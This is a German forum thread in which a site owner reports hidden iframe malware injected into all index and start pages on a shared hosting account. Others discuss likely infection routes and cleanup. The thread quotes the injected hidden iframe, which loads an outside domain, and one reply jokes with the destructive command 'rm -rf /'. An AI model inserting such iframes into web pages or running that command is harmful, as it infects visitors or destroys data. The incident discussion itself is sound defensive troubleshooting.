nicht angemeldet
Server-Virus / Domain Sperren?
Hallo!
Ich habe gestern auf meine Hosting-Server von all-inkl.com einen Virus entdeckt der sich auf jeder start.php/htm und index.php/htm als IFRAME einschreibt
<html><body><iframe src='http://visions7.net/' width=1 height=1 style='visibility:hidden;'></iframe></body></html>
Ich glaube, dieser Virus startet Java mit nem Downloader der den Virus dann letzlich auf den PC bringt!
Könnte ich mit htaccess zB die Auslieferung dieser Domain für alle Ordner unterbinden?
Danke
urx
-
Nein, da die Inhalte auf dem Client gezogen werden. Dieser "Virus" muss irgendwie auf den Server gekommen sein. Du solltest also schnellstmöglich herausfinden, auf welchem Wege, diesen Weg (und alle weiteren, die Dir auffallen) verbauen und den Server von der Schadsoftware befreien.
Gruß, LX
--
RFC 1925, Satz 2: Egal, wie fest man schiebt, ganz gleich, wie hoch die Priorität ist, man kann die Lichtgeschwindigkeit nicht erhöhen.-
Ich glaube der Virus war aufm meinem Rechner, hat sich über einen freien FTPport Zugang verschafft und alle Ordner durchgescant und infiziert! denn es waren alle Webseiten betroffen und das kann durch _eine_ Sicherheitslücke in einer Website nicht passiert sein (behaupte ich mal)
Ich denke der Virus befand sich auf meinem Laptop.. dieser wird gerade neu Installiert...
Wie kann ich denn aber sonst noch verhindern, dass der Iframe ausgeführt wird?
Ich habe schon ein Finder-Script geschrieben, das ist aber leider nicht dazu in der Lage alle Folder zu scannen aufgrund des Linux-Rechtesystems und das Entfernen mache ich auch Händisch...
Der Hoster müsste aus seinem Interesse ein "Tool" anbieten womit man per Knopfdruck sagen könnte "Viren Entfernen" oder das sogar regelmäßig Nachts vom Hoster durchgeführt wird!?urx
-
Der Hoster müsste aus seinem Interesse ein "Tool" anbieten womit man per Knopfdruck sagen könnte "Viren Entfernen" oder das sogar regelmäßig Nachts vom Hoster durchgeführt wird!?
Du müsstest aus Deinem Interesse in einer sicheren Umgebung arbeiten, so dass keine Viren irgendwas auf Deine Homepage schreiben können. Übrigens ist es für die bösen Virenversender immer einfacher, die Erkennung ihrer Viren durch den Hoster zu verhindern, als es für den Hoster ist, eine solche Erkennung vorzunehmen.
Gruß, LX
--
RFC 1925, Satz 2: Egal, wie fest man schiebt, ganz gleich, wie hoch die Priorität ist, man kann die Lichtgeschwindigkeit nicht erhöhen. -
Tach,
Ich glaube der Virus war aufm meinem Rechner, hat sich über einen freien FTPport Zugang verschafft und alle Ordner durchgescant und infiziert! denn es waren alle Webseiten betroffen und das kann durch _eine_ Sicherheitslücke in einer Website nicht passiert sein (behaupte ich mal)
gehören die Dateien alle demselben User? Hat der User mit dem der Webserver läuft Schreibrecht auf die Dateien?
Ich denke der Virus befand sich auf meinem Laptop.. dieser wird gerade neu Installiert...
Wie kann ich denn aber sonst noch verhindern, dass der Iframe ausgeführt wird?
Löschen und sauberes Backup (mit geschlossenen Sicherheitslücken) einspielen.
Der Hoster müsste aus seinem Interesse ein "Tool" anbieten womit man per Knopfdruck sagen könnte "Viren Entfernen" oder das sogar regelmäßig Nachts vom Hoster durchgeführt wird!?
Ich als Hoster würde dafür rm empfehlen.
mfg
Woodfighter-
Ich als Hoster würde dafür rm empfehlen.
Aber nicht als root mit der "really-fast"-Option: "rm -rf /" :p
-
gehören die Dateien alle demselben User? Hat der User mit dem der Webserver läuft Schreibrecht auf die Dateien?
Ja selber User, schreibe rechte meist unbedacht gesetzt um ganz ehrlich zu sein, aber per SQL-Injection kann das doch nicht funktionieren. Was kann das für eine Methode sein?
Wie gesagt ich vermute, dass der Virus direkt vom Heim-PC aus über FTP die Aktionen ausgeführt hat.urx
-
Tach,
Ja selber User, schreibe rechte meist unbedacht gesetzt um ganz ehrlich zu sein, aber per SQL-Injection kann das doch nicht funktionieren. Was kann das für eine Methode sein?
ich habe keine Ahnung, was auf deinem Server läuft, aber wenn du z.B. eine Lücke in einem PHP-Script hast, über die man beliebigen Code ausführen kann, ist das kein Problem, genauso per SQL-Injection, wenn irgendwo Daten aus SQL ausgeführt werden können...
Wie gesagt ich vermute, dass der Virus direkt vom Heim-PC aus über FTP die Aktionen ausgeführt hat.
Halte ich für sehr sehr unwahrscheinlich.
mfg
Woodfighter-
Wie soll man das Herausfinden bei potentiellen 100 Sicherheitslücken?
-
Gehe alle einzeln durch und zwar nach der Einfachheit des Angriffs sowie Einfachheit der Erkennung, ob die Lücke genutzt wurde. Angriffe über einen Login hinterlassen üblicherweise Spuren in den Log-Dateien. Angriffe in der Datenbank lassen sich ebenfalls relativ einfach nachvollziehen.
Diese Jagd nach dem kritischen Sicherheitsloch ist ein Geduldsspiel, insbesondere wenn man von vorneherein genügend Lücken offen gelassen hat.
Gruß, LX
--
RFC 1925, Satz 2: Egal, wie fest man schiebt, ganz gleich, wie hoch die Priorität ist, man kann die Lichtgeschwindigkeit nicht erhöhen.
-
-
Moin!
Wie gesagt ich vermute, dass der Virus direkt vom Heim-PC aus über FTP die Aktionen ausgeführt hat.
Halte ich für sehr sehr unwahrscheinlich.
Ich nicht unbedingt:
Mein Webspace hatte gezippte Daten (dds Dateien) ein paar JPGs mit Screendesigns und ein Versuchsscript, das den Serverstatus eines AION Servers angezeigt hat.
Mein Webspace war vor einiger Seit voellig verseucht mit zufaellig benannten HTML Dateien die fleissig Viren verteilt haben. Bestehende Dateien waren auch befallen. Keine der mir unbekannten Dateien war ein php Script oder aehnliches. Es kann keine Sicherheitsluecke gewesen sein. Das einzig ungewoehnliche war ein Virusbefall meines heimischen Rechners im Sommer. Bleibt eine Verseuchung meines Webspaces durch meinen eigenen Rechner oder das Vieh hat Filezilla nach meinen Zugangsdaten durchsucht und versendet. Jede andere Moeglichkeit schliesse ich aus.
Das erinnert mich: Ich muss mal wieder nach dem Rechten schauen...
--
Vergesst Chuck Norris.
Sponge Bob kann unter Wasser grillen!-
'ǝɯɐu$ ıɥ
Bleibt eine Verseuchung meines Webspaces durch meinen eigenen Rechner oder das Vieh hat Filezilla nach meinen Zugangsdaten durchsucht und versendet. Jede andere Moeglichkeit schliesse ich aus.
Nunja, es gibt noch andere Möglichkeiten: Zugang über Confixx, root zugriff über einen anderen Account bei shared hosting, Viren/Trojaner in einer auf dem Server installierten Software, fehlkonfiguration des Servers die Scripten den Zugriff auf andere Accounts erlauben,...
ssnɹƃ
ʍopɐɥs--
“If the automobile had followed the same development cycle as the computer, a Rolls-Royce would today cost $100, get a million miles per gallon, and explode once a year, killing everyone inside.”
(Robert X. Cringely)-
moin!
Bleibt eine Verseuchung meines Webspaces durch meinen eigenen Rechner oder das Vieh hat Filezilla nach meinen Zugangsdaten durchsucht und versendet. Jede andere Moeglichkeit schliesse ich aus.
Nunja, es gibt noch andere Möglichkeiten: Zugang über Confixx, root zugriff über einen anderen Account bei shared hosting, Viren/Trojaner in einer auf dem Server installierten Software, fehlkonfiguration des Servers die Scripten den Zugriff auf andere Accounts erlauben,...
Klar. Aber dann wuerde ich ja behaupten mein Provider verstuende sein Handwerk nicht. Kann ja gar nicht sein! ... -.- *hust*
Ne. Im Ernst. Moeglich ist das natuerlich.
--
Vergesst Chuck Norris.
Sponge Bob kann unter Wasser grillen!
-
-
-
-
-
-
-
und den Server von der Schadsoftware befreien.
Was in den meisten Faellen soviel bedeutet wie: loesche alle Dateien.
--
Vergesst Chuck Norris.
Sponge Bob kann unter Wasser grillen!
-